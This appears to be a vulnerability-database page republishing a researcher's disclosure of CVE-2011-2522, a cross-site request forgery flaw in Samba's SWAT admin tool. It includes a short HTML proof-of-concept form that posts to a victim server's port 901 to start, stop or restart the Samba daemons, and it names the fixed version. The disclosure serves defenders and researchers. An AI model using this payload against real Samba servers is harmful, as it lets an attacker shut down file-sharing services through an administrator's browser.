Samba Web Administration Tool Cross-Site Request Forgery +PoC

Risk: Low
Local: No
Remote: Yes
CWE: CWE-352

CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

<!-- # Secur-I Research Group - Proof-of-Concept # ========================================================================== # Title: Cross-Site Request Forgery in SWAT (Samba Web Administration Tool) # Vulnerable versions: Samba 3.0.x - 3.5.9 (inclusive) # Fixed version: Samba 3.5.10 # Product Homepage: # CVE-ID: CVE-2011-2522 # References: # ========================================================================== --> <html> <body> <form method=post action="http://VULN_SERVER:901/status"> <input type=submit"") name="VUL_PARM" value="w00t!"> </body> </html> <!-- VUL_PARM could be one of the following:- smbd_start, smbd_stop, smbd_restart : To start/stop/restart smbd(Samba) daemon nmbd_start, nmbd_stop, nmbd_restart : To start/stop/restart nmbd(NETBIOS) daemon winbindd_start, winbindd_stop, winbindd_restart : To start/stop/restart winbindd(Windows Name Service Switch) daemon --> Thanks & Regards, Narendra. Confidentiality: This e-mail and any attachments may be confidential and may also be privileged. If you are not an intended named recipient, please notify the sender immediately and do not disclose the contents to another person use it for any purpose, or store or copy the information in any medium.


Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024,


Back to Top